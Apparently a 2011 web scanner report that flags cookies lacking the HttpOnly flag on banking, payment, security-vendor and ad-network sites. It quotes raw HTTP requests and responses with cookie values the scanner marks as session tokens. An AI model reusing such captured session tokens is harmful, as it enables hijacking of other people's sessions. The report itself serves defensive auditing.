BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ecommerce/categories/PCI-ASV-Scanning-Services/ HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ecommerce/categories/Penetration-Testing/ HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ecommerce/categories/Vulnerability-Scan-Services/ HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pci-scanning.html HTTP/1.1 Host: www.clone-systems.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resources/webinars/e-commerce/pci-compliance-demystified.php?gclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg HTTP/1.1 Host: www.comodo.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en_us/home HTTP/1.1 Host: www.firstdata.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=1svklbmve2bqs.cb2;Path=/bookings
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bookings/booknowjstag.action?id=30134654&bookingSourceId=1000 HTTP/1.1 Host: www.genbook.com Proxy-Connection: keep-alive Referer: http://www.afreshbunch.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=osxco9rc5dgs.cb1;Path=/bookings
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=1qj66h5mnv6z7.cb2;Path=/bookings
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.hugthecloud.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:18:27 GMT Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: xn_visitor=ee890453-6b17-46ae-a9d8-af6fdfda375d;Path=/;Domain=.hugthecloud.com;Expires=Fri, 23-Apr-21 13:18:27 GMT Set-Cookie: ning_session=3DtBNRdYb0ZI8bIxNwyKF8vI8uD7jqsGwx9yRIPU6xi52l4UL5heqChGDHvXjopviwdKMsemcLE=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:27 GMT X-XN-Trace-Token: 94f68857-016c-408c-9214-fd573d274bbe X-XN-XNHTML: false Date: Tue, 26 Apr 2011 12:39:16 GMT Date: Tue, 26 Apr 2011 12:39:16 GMT Vary: X-XN_APPLICATION P3P: CP="UNI STA LOC CURa OURa COR ALL IND" Expires: Thu, 01 Jan 1970 00:00:00 GMT Last-Modified: Tue, 26 Apr 2011 12:39:16 UTC CACHE-CONTROL: max-age=0 CACHE-CONTROL: no-cache="Set-Cookie" Content-Type: text/html; charset=utf-8 Server: Ning HTTP Server 2.0 Content-Length: 54058
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.hugthecloud.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: xn_visitor=367ebb41-9a4a-4792-a848-e329e8f51d58; ning_session=JqIvd+vE/aq+TxfD6DNxfrwKspEymAzf4jDvQHmTVN4Abhhcdp6LFBsMRGdDlgSH6V+jaPEOm0Y=; 2__utmz=^ning.1319591918512:85044224.1303823919.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmv=^ning.1303823918511:; 2__utma=^ning.1366895918512:85044224.1282109851.1303823919.1303823919.1303823919.1; 2__utmc=^ning.1366895918512:85044224; 2__utmb=^ning.1303825718512:85044224.1.10.1303823919; xn_track=rp%252C%25252F%252Crc%252C0%252Csi%252C1303823924%252Cse%252C1303824824
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 13:18:42 GMT Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: ning_session=JqIvd+vE/aq+TxfD6DNxfrwKspEymAzf4jDvQHmTVN4Abhhcdp6LFGef0Np4Of2wCuLXfA8BPNs=;Path=/;Domain=.hugthecloud.com;Expires=Tue, 26-Apr-11 14:18:42 GMT X-XN-Trace-Token: 1e53f0bd-ed7d-431f-993e-ef218725020a ETag: "db9c1-483-45a88f5754cc0" Date: Tue, 26 Apr 2011 12:36:52 GMT Date: Tue, 26 Apr 2011 12:36:52 GMT Vary: X-XN_APPLICATION P3P: CP="UNI STA LOC CURa OURa COR ALL IND" Expires: Thu, 01 Jan 1970 00:00:00 GMT Last-Modified: Fri, 31 Oct 2008 09:09:47 GMT CACHE-CONTROL: max-age=0 CACHE-CONTROL: no-cache="Set-Cookie" Content-Type: image/x-icon Accept-Ranges: bytes Server: Ning HTTP Server 2.0 Content-Length: 1155
The following cookie was issued by the application and does not have the HttpOnly flag set:
SESSa3ee040a33364f343ddaa1d4cf0e6bab=2q12tlg89jgpaked26837s8347; expires=Thu, 19 May 2011 03:18:39 GMT; path=/; domain=.m8security.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.m8security.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.net-address.co.uk Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html> <head> <title>Net-Address UK and international domain name registration including .com and .co.uk, with control panel management</title> <meta http-equiv="content-type" content="text/html; c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/redir.php?prof=56&camp=3086&affcode=kw134&cid=10327990298&networkType=search&url[]=http%3A%2F%2Fservedby.flashtalking.com%2Fclick%2F16008%3B128708%3B94221%3B230%3B3%2F%3Furl%3Dhttp:%2F%2Fresponse.firstdata.com%2F%3FelqPURLPage%3D15 HTTP/1.1 Host: 109.xg4ken.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 25 Apr 2011 23:44:03 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=2c557654-692b-10a8-2a58-00004d95d016; expires=Sun, 24-Jul-2011 23:44:03 GMT; path=/; domain=.xg4ken.com Location: http://servedby.flashtalking.com/click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/?t=i&f=j&p=5112&pl=bb9cfe77&rnd=81239918339997540&clkurl=http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAlx8LKgAAAAA./cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ../referrer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1 Host: ad.amgdgt.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: UA=AAAAAQAUKF.3vTpKG5CpzwVpYH3m5EI9n_UDA3gBY2BgEGFg6lzCwJLdzMDI.4uB4YY7AwMDJwMDo_4k_VhlqFwrUO4HUM4VJtfLsc0bKtcClPsJlHNDyLn045LryI45hVMuye06TrkIr2s45fwmhOCUc23ggMq1Ad35HehOF5g7OyTcb.PUJ2GnjUtf.8mdm3Dpaz85oxan3AnhxTjlji14hFPu6FdBnHIzFrDjlrNtxSk3_aEnbrmOlbjlTHWB4ceIU76yWwgoz.C7jZuBgQOYkHYyMjEyMATeYmQBUgwGzAwijGARBTMwtbQALMGSycgOlGcJYWJn5AAy5HcxM3BBFELTIchQBgBQFY53; Domain=.amgdgt.com; Expires=Thu, 26-May-2011 14:21:08 GMT; Path=/ Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache, no-store P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript;charset=UTF-8 Content-Length: 3896 Date: Tue, 26 Apr 2011 14:21:07 GMT
_289667_amg_acamp_id=166308; _289667_amg_pcamp_id=69114; _289667_amg_location_id=55367; _289667_amg_creative_id=289667; _289667_amg_loaded=true; var _amg_289667_content='<script type="text/javascript" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pixel?id=1258184&t=2 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://response.firstdata.com/?elqPURLPage=15 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; lifb=o1s9XS8(?nv?!8H; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!#8!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#+<r!!!!#<wO:5!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#3pv!!!!#<wsXA!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#b@%!!!!#<wsXA!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#l)E!!!!#<wsXA!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; BX=8khj7j56qmjsh&b=4&s=dk&t=106
Response
HTTP/1.1 302 Found Date: Mon, 25 Apr 2011 23:44:13 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: bh="b!!!#9!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#+<r!!!!#<wO:5!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#3pv!!!!#<wsXA!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsXA!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#b@%!!!!#<wsXA!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#l)E!!!!#<wsXA!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$'/1!!!!#<wx=%!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; path=/; expires=Wed, 24-Apr-2013 23:44:13 GMT Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT Location: http://ib.adnxs.com/seg?add=115983&t=2 Cache-Control: no-store Last-Modified: Mon, 25 Apr 2011 23:44:13 GMT Pragma: no-cache Content-Length: 0 Age: 0 Proxy-Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=7&c2=8097938&rn=1114821727&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.tenable.com%252Fservices%252Fnessus-perimeter-service%253Fgclid%253DCNLb8cPsuKgCFQbe4AodEirYCA%26jsref%3D%26rnd%3D1303775074503&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&jsref=&rnd=1303775074503 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=25894b9d-24.143.206.177-1303083414
Response
